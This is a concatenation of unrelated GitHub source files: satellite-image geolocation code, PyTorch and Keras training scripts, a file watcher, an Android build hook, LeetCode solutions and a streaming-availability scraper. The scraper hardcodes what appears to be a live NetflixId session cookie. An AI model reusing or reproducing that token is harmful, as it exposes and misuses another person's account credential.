type: ndarray\n                                                alts,  # type: ndarray\n                                                d_lon=None,  # type: float\n                                                d_lat=None,  # type: float\n                                                band=None,  # type: int\n                                                max_pixel_error=0.01,  # type: float\n                                                max_iter=1000,  # type: int\n                                                ):  # type: (...) -> (ndarray, ndarray)\n        \"\"\"\n        This is a protected method that is used to solve for longitude and latitude given pixel x, y and altitude values.\n        It uses an approximation of a Newton method solver.\n        :param pixel_xs: pixel x values, as a 1d numpy ndarray\n        :param pixel_ys: pixel y values, as a 1d numpy ndarray\n        :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n        :param d_lon: delta_longitude to use for the Newton-like solver. If it is not provided this value will be calculated\n        :param d_lat: delta_latitude to use for the Newton-like solver. If it is not provided this value will be calculated\n        :param band: image band as an int or None if all the bands are coregistered\n        :param max_pixel_error: maximum pixel error. 
Same as the description in pixel_x_y_alt_to_lon_lat\n :param max_iter: Same as the description in pixel_x_y_alt_to_lon_lat\n :return: (longitude, latitude) in the point calculator's native projection, as a tuple of numpy ndarrays\n \"\"\"\n\n n_pixels = np.shape(pixel_xs)\n approximate_lon, approximate_lat = self.get_approximate_lon_lat_center()\n # initial lons and lats to all be the approximate center of the image\n lons, lats = np.zeros(n_pixels) + approximate_lon, np.zeros(n_pixels) + approximate_lat\n\n if d_lon is None or d_lat is None:\n d_pixel = 1\n # we want the delta to be on the order of 1 pixel or so, maybe change this later to scale with the errors\n machine_eps = np.finfo(lons.dtype).eps\n machine_max_val = np.finfo(lons.dtype).max\n machine_val_cutoff = machine_max_val / 4.0\n float_nums = []\n current_num = machine_eps\n while current_num < machine_val_cutoff:\n float_nums.append(current_num)\n current_num = current_num * 2\n float_nums = np.array(float_nums)\n machine_lons = np.zeros(np.shape(float_nums)) + approximate_lon\n machine_lats = np.zeros(np.shape(float_nums)) + approximate_lat\n machine_d_lons = machine_lons + float_nums\n machine_d_lats = machine_lats + float_nums\n machine_alt = np.average(alts)\n\n machine_pixel_lon_lat = \\\n self.lon_lat_alt_to_pixel_x_y(approximate_lon, approximate_lat, machine_alt, band=band)\n\n machine_lon_pixels_x, machine_lon_pixels_y = \\\n self.lon_lat_alt_to_pixel_x_y(machine_d_lons, machine_lats, machine_alt, band=band)\n machine_lat_pixels_x, machine_lat_pixels_y = \\\n self.lon_lat_alt_to_pixel_x_y(machine_lons, machine_d_lats, machine_alt, band=band)\n\n machine_pixels_lon_x_diff = machine_lon_pixels_x - machine_pixel_lon_lat[0]\n machine_pixels_lon_y_diff = machine_lon_pixels_y - machine_pixel_lon_lat[1]\n\n machine_pixels_lat_x_diff = machine_lat_pixels_x - machine_pixel_lon_lat[0]\n machine_pixels_lat_y_diff = machine_lat_pixels_y - machine_pixel_lon_lat[1]\n\n # find the first index where a shift in longitude is greater than 1 pixel\n # TODO: this is broken in some cases. 
fix and add unit tests.\n        if np.isnan(machine_pixels_lon_x_diff).max() and np.isnan(machine_pixels_lon_x_diff).max():\n            d_lon = 2\n            d_lat = 2\n        else:\n            lon_gt1_pixel_index = (np.where(np.square(machine_pixels_lon_x_diff) +\n                                            np.square(machine_pixels_lon_y_diff) > np.square(d_pixel))[0])[0]\n            d_lon = machine_d_lons[lon_gt1_pixel_index] - approximate_lon\n\n            # find the first index where a shift in latitude is greater than 1 pixel\n            lat_gt1_pixel_index = (np.where(np.square(machine_pixels_lat_x_diff) +\n                                            np.square(machine_pixels_lat_y_diff) > np.square(d_pixel))[0])[0]\n            d_lat = machine_d_lats[lat_gt1_pixel_index] - approximate_lat\n\n        for i in range(max_iter):\n            pixel_x_estimate, pixel_y_estimate = self.lon_lat_alt_to_pixel_x_y(lons, lats, alts, band=band)\n\n            lon_shift = lons + d_lon\n            lat_shift = lats + d_lat\n\n            pixel_x_shift_x, pixel_y_shift_x = self.lon_lat_alt_to_pixel_x_y(lon_shift, lats, alts, band=band)\n            pixel_x_shift_y, pixel_y_shift_y = self.lon_lat_alt_to_pixel_x_y(lons, lat_shift, alts, band=band)\n\n            pxx = (pixel_x_shift_x - pixel_x_estimate) / d_lon\n            pxy = (pixel_x_shift_y - pixel_x_estimate) / d_lat\n            pyx = (pixel_y_shift_x - pixel_y_estimate) / d_lon\n            pyy = (pixel_y_shift_y - pixel_y_estimate) / d_lat\n\n            delta_px = pixel_xs - pixel_x_estimate\n            delta_py = pixel_ys - pixel_y_estimate\n\n            delta_lat = (delta_py * pxx - pyx * delta_px) / (pyy * pxx - pxy * pyx)\n            delta_lon = (delta_px - delta_lat * pxy) / pxx\n\n            new_lons = lons + delta_lon\n            new_lats = lats + delta_lat\n\n            new_pixel_x, new_pixel_y = self.lon_lat_alt_to_pixel_x_y(new_lons, new_lats, alts, band=band)\n\n            lons = new_lons\n            lats = new_lats\n\n            x_err = np.abs(pixel_xs - new_pixel_x).max()\n            y_err = np.abs(pixel_ys - new_pixel_y).max()\n\n            if x_err <= max_pixel_error and y_err <= max_pixel_error:\n                break\n\n        return lons, lats\n\n    def _pixel_x_y_to_lon_lat_ray_caster_native(self,\n                                                pixels_x,  # type: ndarray\n                                                pixels_y,  # type: ndarray\n                                                dem,  # type: AbstractDem\n                                                dem_sample_distance,  # type: float\n                                                dem_highest_alt=None,  # type: float\n                                                dem_lowest_alt=None,  # type: float\n                                                band=None,  # type: int\n                                                ):  # type: (...) -> (ndarray, ndarray, ndarray)\n        \"\"\"\n        Protected method that solves for pixel x, y by casting rays onto a DEM. This is used when the pixel altitudes\n        are not already known, and only a method for _lon_lat_alt_to_pixel_x_y_native is available.\n        :param pixels_x: x pixels, as a numpy ndarray\n        :param pixels_y: y pixels, as a numpy ndarray\n        :param dem: digital elevation model, as concrete implementation of an AbstractDem object\n        :param dem_sample_distance: resolution at which to sample the DEM, in meters. If no value is provided\n        this value will default to 5 meters.\n        :param dem_highest_alt: Highest DEM altitude. This will be calculated using the full DEM if it is not provided\n        :param dem_lowest_alt: Lowest DEM altitude. 
This will be calculated using the full DEM if it is not provided\n :param band: image band, as an int, or None if all the image bands are coregistered.\n :return: (longitude, latitude, altitude) in the point calculator's native projection, and the input DEM's\n elevation reference dataum\n \"\"\"\n\n # TODO put stuff in here to make sure nx and ny are same size\n # TODO put something here to check that the DEM projection and image projection are the same\n ny = None\n nx = None\n is2d = np.ndim(pixels_x) == 2\n if is2d:\n ny, nx = np.shape(pixels_x)\n pixels_x = image_utils.flatten_image_band(pixels_x)\n pixels_y = image_utils.flatten_image_band(pixels_y)\n\n n_pixels_to_project = len(pixels_x)\n\n max_alt = dem_highest_alt\n min_alt = dem_lowest_alt\n\n if max_alt is None:\n max_alt = dem.get_highest_alt()\n if min_alt is None:\n min_alt = dem.get_lowest_alt()\n alt_range = max_alt - min_alt\n\n # put the max and min alts at 1 percent above and below the maximum returned by the DEM\n max_alt = max_alt + alt_range * 0.01\n min_alt = min_alt - alt_range * 0.01\n\n lons_max_alt, lats_max_alt = self.pixel_x_y_alt_to_lon_lat(pixels_x, pixels_y, max_alt, band=band)\n lons_min_alt, lats_min_alt = self.pixel_x_y_alt_to_lon_lat(pixels_x, pixels_y, min_alt, band=band)\n\n # TODO this operation becomes very expensive at very fine DEM resolutions\n # TODO create implementation for a raster DEM that works faster\n # TODO the time consuming operations are obtaining lon/lats for many points as the DEM resolution becomes finer\n\n ray_horizontal_lens = np.sqrt(\n np.square(lons_max_alt - lons_min_alt) + np.square(lats_max_alt - lats_min_alt))\n n_steps_per_ray = int(np.ceil(np.max(ray_horizontal_lens) / dem_sample_distance) + 1)\n\n lons_matrix = np.zeros((n_pixels_to_project, n_steps_per_ray)) + np.linspace(0, 1, n_steps_per_ray)\n lats_matrix = np.zeros((n_pixels_to_project, n_steps_per_ray)) + np.linspace(0, 1, n_steps_per_ray)\n\n lons_matrix = np.tile((lons_min_alt - lons_max_alt), (n_steps_per_ray, 1)).transpose() * \\\n lons_matrix + np.tile(lons_max_alt, (n_steps_per_ray, 1)).transpose()\n lats_matrix = np.tile((lats_min_alt - lats_max_alt), (n_steps_per_ray, 1)).transpose() * \\\n lats_matrix + np.tile(lats_max_alt, (n_steps_per_ray, 1)).transpose()\n\n all_elevations = dem.get_elevations(np.array(lons_matrix), np.array(lats_matrix), world_proj=self.get_projection())\n\n ray = np.linspace(max_alt, min_alt, n_steps_per_ray)\n first_ray_intersect_indices = np.zeros(n_pixels_to_project, dtype=np.int)\n ray_step_indices = list(range(n_steps_per_ray))\n ray_step_indices.reverse()\n for i in ray_step_indices:\n does_ray_intersect = all_elevations[:, i] > ray[i]\n first_ray_intersect_indices[np.where(does_ray_intersect)] = i\n\n all_pixel_indices = np.arange(0, n_pixels_to_project, dtype=int)\n\n first_ray_intersect_indices = first_ray_intersect_indices - 1\n second_ray_intersect_indices = first_ray_intersect_indices + 1\n b_rays = ray[first_ray_intersect_indices]\n b_alts = all_elevations[all_pixel_indices, first_ray_intersect_indices]\n\n m_rays = ray[1] - ray[0]\n m_alts = all_elevations[all_pixel_indices, second_ray_intersect_indices] - b_alts\n\n xs = (b_alts - b_rays) / (m_rays - m_alts)\n intersected_lons = (lons_matrix[all_pixel_indices, second_ray_intersect_indices] -\n lons_matrix[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n lons_matrix[all_pixel_indices, first_ray_intersect_indices]\n intersected_lats = (lats_matrix[all_pixel_indices, second_ray_intersect_indices] -\n 
lats_matrix[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n lats_matrix[all_pixel_indices, first_ray_intersect_indices]\n intersected_alts = (all_elevations[all_pixel_indices, second_ray_intersect_indices] -\n all_elevations[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n all_elevations[all_pixel_indices, first_ray_intersect_indices]\n\n if is2d:\n intersected_lons = image_utils.unflatten_image_band(intersected_lons, nx, ny)\n intersected_lats = image_utils.unflatten_image_band(intersected_lats, nx, ny)\n intersected_alts = image_utils.unflatten_image_band(intersected_alts, nx, ny)\n\n return intersected_lons, intersected_lats, intersected_alts\n\n\n def pixel_x_y_to_lon_lat_alt(self,\n pixels_x, # type: ndarray\n pixels_y, # type: ndarray\n dem, # type: AbstractDem\n world_proj=None, # type: Proj\n dem_sample_distance=None, # type: float\n dem_highest_alt=None, # type: float\n dem_lowest_alt=None, # type: float\n band=None, # type: int\n ): # type: (...) -> (float, float, float)\n \"\"\"\n Solves for pixel x, y by casting rays onto a DEM. Uses _pixel_x_y_to_lon_lat_ray_caster_native under the hood\n and provides some convenience to the user, such as automatic handling of world projections\n :param pixels_x: x pixels, as a 1d or 2d numpy ndarray\n :param pixels_y: y pixels, as a 1d or 2d numpy ndarray\n :param dem: concrete implementation of an AbstractDem, defaults to a flat earth DEM with an elevation of zero if\n this parameter is not provided.\n :param world_proj: world projection of the output longitudes and latitudes.\n :param dem_sample_distance: sample distance to use when sampling the DEM. Defaults to 5 meters\n :param dem_highest_alt: Highest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param dem_lowest_alt: Lowest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param band: Image band, as an int, or None if all of the image bands are coregistered.\n :return: (longitude, latitude, altitude) in the projection specified by the world_proj input parameter, and\n The altitude specified by the input dem object parameter.\n \"\"\"\n\n DEFAULT_DEM_SAMPLE_DISTANCE = 5\n if dem_sample_distance is None:\n dem_sample_distance = DEFAULT_DEM_SAMPLE_DISTANCE\n\n if world_proj is None:\n world_proj = self.get_projection()\n\n native_lons, native_lats, native_alts = self._pixel_x_y_to_lon_lat_ray_caster_native(pixels_x, pixels_y, dem,\n dem_sample_distance,\n dem_highest_alt,\n dem_lowest_alt,\n band=band)\n\n if world_proj.srs != self.get_projection().srs:\n lons, lats = proj_transform(self.get_projection(), world_proj, native_lons, native_lats)\n return lons, lats, native_alts\n else:\n return native_lons, native_lats, native_alts\n\n def get_projection(self): # type: (...) -> Proj\n \"\"\"\n returns the point calculator's native projection\n :return: point calculator's native projection as a pyproj Proj object\n \"\"\"\n return self._projection\n\n def set_projection(self,\n projection # type: Proj\n ): # type: (...) -> None\n \"\"\"\n sets the point calculator's native projection. This should only be used when creating a new point calculator\n :param projection: point calculator's native projection as a pyproj Proj object\n :return: None\n \"\"\"\n self._projection = projection\n\n def get_approximate_lon_lat_center(self): # type: (...) -> (float, float)\n \"\"\"\n Gets the point calculator's approximate lon/lat center, in the point calculator's native projection. 
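The xs interpolation above solves, per pixel, for where the descending ray crosses the terrain between two bracketing samples. The same step in one dimension, with made-up numbers:

import numpy as np

ray = np.linspace(100.0, 0.0, 11)   # ray altitude at 11 stations
terrain = np.full(11, 42.0)         # flat DEM at 42 m (illustrative)

j = int(np.argmax(ray < terrain))   # first station where the ray is below ground
i = j - 1                           # last station above ground
m_ray = ray[j] - ray[i]             # per-station slope of the ray
m_ter = terrain[j] - terrain[i]     # per-station slope of the terrain
x = (terrain[i] - ray[i]) / (m_ray - m_ter)   # fractional crossing, same form as xs above
print(i + x, ray[i] + x * m_ray)    # 5.8, 42.0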
This\n assumes that the lon / lat center was set when the point calculator was initialized.\n :return: (lon, lat) as a tuple of floats\n \"\"\"\n return self._lon_lat_center_approximate\n\n def set_approximate_lon_lat_center(self,\n lon, # type: float\n lat # type: float\n ): # type: (...) -> (float, float)\n \"\"\"\n sets the point calculator's approximate lon / lat center. This should only be used when creating a new\n point calculator.\n :param lon: longitude, in the point calculator's native projection\n :param lat: latitude, in the point calculator's native projection\n :return: None\n \"\"\"\n self._lon_lat_center_approximate = (lon, lat)\n\n def bands_coregistered(self): # type: (...) -> bool\n \"\"\"\n returns a boolean that says whether or not the image object's spectral bands are coregistered. If bands are\n not coregistered then lon/lat to pixel (or vice versa) calculations must be performed for each band. If bands\n are coregistered then these calculations only need to be done once.\n :return: boolean, False if bands are not coregistered, True if they are.\n \"\"\"\n return self._bands_coregistered\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/abstract_earth_overhead_point_calc.py","file_name":"abstract_earth_overhead_point_calc.py","file_ext":"py","file_size_in_byte":28239,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"40351071938","text":"import os, random, torch, json\nimport numpy as np\n\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.mkdir(path)\n \n \ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n \n \ndef get_writer(config, main_rank):\n if config.use_tb and main_rank:\n from torch.utils.tensorboard import SummaryWriter\n writer = SummaryWriter(config.tb_log_dir)\n else:\n writer = None\n return writer\n \n \ndef get_logger(config, main_rank):\n if main_rank:\n import sys\n from loguru import logger\n logger.remove()\n logger.add(sys.stderr, format=\"[{time:YYYY-MM-DD HH:mm}] {message}\", level=\"INFO\")\n\n log_path = f'{config.save_dir}/{config.logger_name}.log'\n logger.add(log_path, format=\"[{time:YYYY-MM-DD HH:mm}] {message}\", level=\"INFO\")\n else:\n logger = None\n return logger\n\n\ndef save_config(config):\n config_dict = vars(config)\n with open(f'{config.save_dir}/config.json', 'w') as f:\n json.dump(config_dict, f, indent=4)\n\n\ndef log_config(config, logger):\n keys = ['dataset', 'num_class', 'model', 'encoder', 'decoder', 'loss_type', \n 'optimizer_type', 'lr_policy', 'total_epoch', 'train_bs', 'val_bs', \n 'train_num', 'val_num', 'gpu_num', 'num_workers', 'amp_training', \n 'DDP', 'kd_training', 'synBN', 'use_ema', 'use_aux']\n \n config_dict = vars(config)\n infos = f\"\\n\\n\\n{'#'*25} Config Informations {'#'*25}\\n\" \n infos += '\\n'.join('%s: %s' % (k, config_dict[k]) for k in keys)\n infos += f\"\\n{'#'*71}\\n\\n\"\n logger.info(infos)\n \n\ndef get_colormap(config):\n if config.colormap == 'cityscapes':\n colormap = {0:(128, 64,128), 1:(244, 35,232), 2:( 70, 70, 70), 3:(102,102,156),\n 4:(190,153,153), 5:(153,153,153), 6:(250,170, 30), 7:(220,220, 0),\n 8:(107,142, 35), 9:(152,251,152), 10:( 70,130,180), 11:(220, 20, 60),\n 12:(255, 0, 0), 13:( 0, 0,142), 14:( 0, 0, 70), 15:( 0, 60,100),\n 16:( 0, 80,100), 17:( 0, 0,230), 18:(119, 11, 32)}\n\n elif config.colormap == 'custom':\n raise NotImplementedError()\n \n else:\n raise 
ValueError(f'Unsupported colormap type: {config.colormap}.')\n\n    colormap = [color for color in colormap.values()]\n\n    if len(colormap) < config.num_class:\n        raise ValueError('Length of colormap is smaller than the number of classes.')\n    else:\n        return colormap[:config.num_class]","repo_name":"zh320/realtime-semantic-segmentation-pytorch","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"11874594751","text":"#!/usr/bin/python\nimport time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nfrom fileRename import renameFile\n\nclass MyHandler(FileSystemEventHandler):\n    def on_modified(self, event):\n        print(\"Got it, modified event called!\")\n        print(event.event_type, event.src_path)\n    def on_created(self, event):\n        print(\"New file created\")\n        #print(event.event_type, event.src_path)\n        filename = str(event.src_path)\n        print('before event fired: ' + filename)\n        renameFile(filename)\n\nif __name__ == \"__main__\":\n    event_handler = MyHandler()\n    observer = Observer()\n    observer.schedule(event_handler, path='.', recursive=False)\n    observer.start()\n\n    try:\n        while True:\n            time.sleep(0.5)\n    except KeyboardInterrupt:\n        observer.stop()\n    observer.join()","repo_name":"Arup/jobSearchBot","sub_path":"loggingeventhandler.py","file_name":"loggingeventhandler.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29990803314","text":"from typing import Any, Callable\nfrom torchvision.models.segmentation.deeplabv3 import DeepLabV3\nfrom datasets.silo_idda import SiloIddaDataset\nfrom experiment.silo_client import SiloClient\nfrom models.abs_factories import OptimizerFactory, SchedulerFactory\nfrom utils.stream_metrics import StreamSegMetrics\n\n\nclass BasicSiloClient(SiloClient):\n\n    def __init__(self, \n                 n_epochs: int, \n                 batch_size: int, \n                 reduction: Callable[[Any], Any], \n                 dataset: SiloIddaDataset, \n                 model: DeepLabV3, \n                 optimizer_factory: OptimizerFactory, \n                 scheduler_factory: SchedulerFactory, \n                 criterion: Callable[[Any], Any], \n                 cluster_id: int, \n                 test_client=False):\n        super().__init__(n_epochs, \n                         batch_size, \n                         reduction, \n                         dataset, \n                         model, \n                         optimizer_factory, \n                         scheduler_factory, \n                         criterion, \n                         cluster_id, \n                         test_client)\n    \n    def test(self, metric: StreamSegMetrics):\n        state = self.model.state_dict()\n        for k, v in state.items():\n            if \"bn.running\" in k or \"bn.num_batches_tracked\" in k:\n                state[k] = None\n            if \"bn.track_running_stats\" in k:\n                state[k] = False\n        super().test(metric)\n","repo_name":"elequaranta/MLDL23-FL-project","sub_path":"experiment/basic_silo_client.py","file_name":"basic_silo_client.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"8561098477","text":"#!/usr/bin/env python3 \n\nimport os\nimport sys\nimport shutil\n\n\ndef get_na_path(): \n    return os.path.join(sys.argv[2])\n\ndef get_build_path():\n    return os.path.join(sys.argv[3], \"../../build\") \n\n\ndef run():\n    build_path = get_build_path()\n    na_path = get_na_path()\n    if len(na_path) == 0:\n        print(\"na-proj path not found! Hook exiting!\")\n        sys.exit(2)\n    print(\"Build path is ->%s\" % build_path)\n    print(\"Native path is ->%s\" % na_path)\n    gen_list = [\n        
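One note on the copy step this hook performs just below: on Python 3.8+, shutil.copytree accepts dirs_exist_ok=True, which can replace the rmtree-then-copytree pair when overwriting in place is acceptable, though unlike rmtree it leaves stale files in the destination. A hedged sketch with placeholder paths:

import shutil

def sync_dir(src: str, dst: str) -> None:
    # overwrite files in place; stale files already in dst are NOT removed
    shutil.copytree(src, dst, dirs_exist_ok=True)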
\"UnityfoNa/unityLibrary/src/main/jniLibs\",\n \"UnityfoNa/unityLibrary/src/main/assets\",\n ]\n tar_list = [\n \"unityLibrary/src/main/jniLibs\",\n \"unityLibrary/src/main/assets\"\n ]\n\n if len(gen_list) != len(tar_list):\n print(\"Copy from path count must equal tar path count!\")\n sys.exit(2)\n\n for i in gen_list:\n f_p = os.path.join(build_path, i)\n t_p = os.path.join(na_path, i)\n if not os.path.isdir(f_p):\n print(\"Copy from path <%s> is not exist!\"%f_p)\n sys.exit(2)\n\n if os.path.isdir(t_p):\n shutil.rmtree(t_p)\n print(\"Coyp the path...from <{f}> \\n to <{t}>\\n\".format(f = f_p, t = t_p))\n shutil.copytree(f_p, t_p)\n","repo_name":"dingcode-icu/ucmd","sub_path":"test/.ucmd_hook/after/android_at.py","file_name":"android_at.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6693463759","text":"from lxml import html\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\nnetflix_id = 'ct%3DBQAOAAEBEATp0bYq7WpJobwE2PxFi1GB0OFGe9fyVUGgEmMKudOmST2ospxDejcLabZb-a3zFhSIPmLL-LubOlcp18DC1Yp9IQXlyR-y6mOSGwjo5snK8SeWZT_z-w71QLKFhyjD8DxGi-IpD0DSTNQefMjFyNNV67Y-sXKb8o-J4bQjokQ-xBESCmMrVuJxaALTgveeeqd_jRGsQOoSIluQyKzsdqELELCbD_GTy3IyatEK9nUrINjfOXOvNg-PsTpF3Xou10c2iI0Ej1siUbvAvpBmoQFkBrGL5PisSMHdK6tNn01yNu6LCClx6UTzqothGEmyCJVydaX1JpwSSOPCN42-0YcDsBwOLkSJLW8FqF4Ips_qouQPjxmCDJ_e4Zwo2cO0o8NHbmo98vncxn1cz6SY0IAKXHppjRygwjEEucUN1SgLoBec1qIT-PZcrtXxukU38VEgLObxMD7Dafz7UV_Ix0bZrNN75eD1W4bKq5fXgpIyvCdRJA7kWquTvf1aTemdIyBzkZgjo9_rHIw_iR7vjkQJSnA6h8xZchCLU_i-79CRtSWmlkxfrrRxvZiDtB-_VrUp8TvS-0C7FJGWRX0fuGBVFd8evPKo8KHpz0HJ2lhNJ7p54rMuh0jkmUXxcdsS1buS%26bt%3Ddbl%26ch%3DAQEAEAABABQAaWFmKVnfQE_QTXzpHQwZOGaGPlFZ0k8.%26v%3D2%26mac%3DAQEAEAABABQmXZcAB1cgpvmlTl2g6utsyl_XbKPPxv0.'\n\ndef scrape_netflix(title):\n\tcookies = {'NetflixId' : netflix_id,\n 'profilesNewSession' : '0',\n 'profilesNewUser' : '0'\n }\n\twith requests.Session() as s:\n\t response = s.get(\"https://www.netflix.com/search?q=\" + title, cookies = cookies)\n\tsearch_results_page = BeautifulSoup(response.content, 'lxml')\n\tsearch_results_list = search_results_page.find_all('div', 'title-card-container')\n\tfor result in search_results_list:\n\t\tif list(result.descendants)[0]['aria-label'].lower() == title.lower():\n\t\t\treturn True\n\treturn False\n\ndef scrape_amazon(title):\n\tresponse = requests.get('https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dinstant-video&field-keywords=' + title)\n\tsearch_results_page = BeautifulSoup(response.content, 'lxml')\n\tsearch_results_list = list(search_results_page.find_all(text = title))\n\tif len(search_results_list) > 0:\n\t\treturn True\n\treturn False\n\ndef search_imdb(search_string):\n\tresults_list = []\n\tsearch_string.replace(\" \", \"+\") \n\twith requests.Session() as s:\n\t\tresponse = s.get(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=\" + search_string + \"&s=all\")\n\tpage = BeautifulSoup(response.content, 'lxml')\n\tx = page.find(\"div\", { \"class\" : \"findSection\" })\n\tfor elem in page.find(\"div\", { \"class\" : \"findSection\" }).find_all('td', {\"class\" : 'result_text'}):\n\t\tresults_list.append(elem.text)\n\treturn results_list\n\n\n# Add hulu and other sites later\nif __name__ == '__main__':\n\tprint(scrape_netflix(\"Rogue One: A Star Wars 
story\"))","repo_name":"vikrumn/entertainment_alerter_app","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36259815925","text":"class Solution:\n def selfDividingNumbers(self, left: int, right: int) :\n def isSelfDivNum(num):\n helper = list(str(num))\n for i in helper:\n i = int(i)\n if i == 0:\n return False\n if num % i != 0:\n return False\n return True\n\n ret = []\n for i in range(left,right+1):\n if isSelfDivNum(i):\n ret.append(i)\n return ret\n\n\nslu = Solution()\nprint(slu.selfDividingNumbers(1, 22))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p728_selfDividingNumbers.py","file_name":"p728_selfDividingNumbers.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915876724","text":"\"\"\"\nLeetcode #1431 Kids With the Greatest Number of Candies\n\nGiven the array candies and the integer extraCandies, where candies[i] represents the number of candies that the ith kid has.\n\nFor each kid check if there is a way to distribute extraCandies among the kids such that he or she can have the greatest number of candies among them. Notice that multiple kids can have the greatest number of candies.\n\nExample 1:\nInput: candies = [2,3,5,1,3], extraCandies = 3\nOutput: [true,true,true,false,true] \nExplanation: \nKid 1 has 2 candies and if he or she receives all extra candies (3) will have 5 candies --- the greatest number of candies among the kids. \nKid 2 has 3 candies and if he or she receives at least 2 extra candies will have the greatest number of candies among the kids. \nKid 3 has 5 candies and this is already the greatest number of candies among the kids. \nKid 4 has 1 candy and even if he or she receives all extra candies will only have 4 candies. \nKid 5 has 3 candies and if he or she receives at least 2 extra candies will have the greatest number of candies among the kids. 
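Back to the self-dividing-numbers solution above: a divmod digit loop avoids the string round-trip. A minimal equivalent sketch:

def is_self_dividing(num: int) -> bool:
    n = num
    while n:
        n, digit = divmod(n, 10)    # peel off the last digit
        if digit == 0 or num % digit:
            return False
    return True

print([x for x in range(1, 23) if is_self_dividing(x)])
# [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 15, 22]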
\n\nExample 2:\nInput: candies = [4,2,1,1,2], extraCandies = 1\nOutput: [true,false,false,false,false] \nExplanation: There is only 1 extra candy, therefore only kid 1 will have the greatest number of candies among the kids regardless of who takes the extra candy.\n\nExample 3:\nInput: candies = [12,1,12], extraCandies = 10\nOutput: [true,false,true]\n \n\nConstraints:\n2 <= candies.length <= 100\n1 <= candies[i] <= 100\n1 <= extraCandies <= 50\n\nAlgorithm/DS used: <ALGORITHM USED/DS USED>\n\n<AVERAGE TIME COMPLEXITY> worst case time\n\n<AVERAGE SPACE COMPLEXITY> worst case space\n\n\"\"\"\n\n\nfrom typing import List\n\n\nclass Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n result = []\n greatest = max(candies)\n for pieces in candies:\n result.append(pieces + extraCandies >= greatest)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [2, 3, 5, 1, 3], 3 is [True, True, True, False, True] and the Actual result is: \" +\n str(s.kidsWithCandies([2, 3, 5, 1, 3], 3)))\n assert s.kidsWithCandies([2, 3, 5, 1, 3], 3) == [\n True, True, True, False, True]\n assert s.kidsWithCandies([4, 2, 1, 1, 2], 1) == [\n True, False, False, False, False]\n assert s.kidsWithCandies([12, 1, 12], 10) == [True, False, True]\n\n\nif __name__ == \"__main__\":\n test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/kids_with_the_greatest_number_of_candies.py","file_name":"kids_with_the_greatest_number_of_candies.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061310799","text":"a = {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36}\nb = {5: 49, 8: 64, 9: 81, 10: 100}\n\nfor key,value in b.items():\n if key in a.keys():\n print(\"not possible for key\",key) \n else:\n a[key]=value\n\nprint(a)","repo_name":"Krupal01/python_programs","sub_path":"concat_disc.py","file_name":"concat_disc.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7341347637","text":"from __future__ import print_function\nimport keras\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding\nfrom keras.layers import LSTM\nfrom keras.datasets import imdb\nfrom keras.callbacks import LearningRateScheduler\nfrom keras import optimizers\nfrom keras.optimizers import SGD\nimport numpy as np\nmax_features = 20000\nmaxlen = 400 # cut texts after this number of words (among top max_features most common words)\nbatch_size = 100\n\nprint('Loading data...')\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)\nprint(len(x_train), 'train sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\nprint('x_train shape:', x_train.shape)\nprint('x_test shape:', x_test.shape)\n\nclass LossHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get('acc'))\n\ndef step_decay(initial_rate):\n loss, acc = model.evaluate(x_train, y_train, verbose=0)\n lrate = initial_rate * np.exp(loss)\n return lrate\n\nlrate = LearningRateScheduler(step_decay)\n\nclass 
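The dict-merge loop in the small snippet above (keep a's values, report colliding keys, add the rest) can also be written without explicit membership tests in the loop body; an equivalent sketch:

a = {1: 1, 2: 4, 3: 9}
b = {2: 49, 8: 64}
collisions = [k for k in b if k in a]                 # keys that would be skipped
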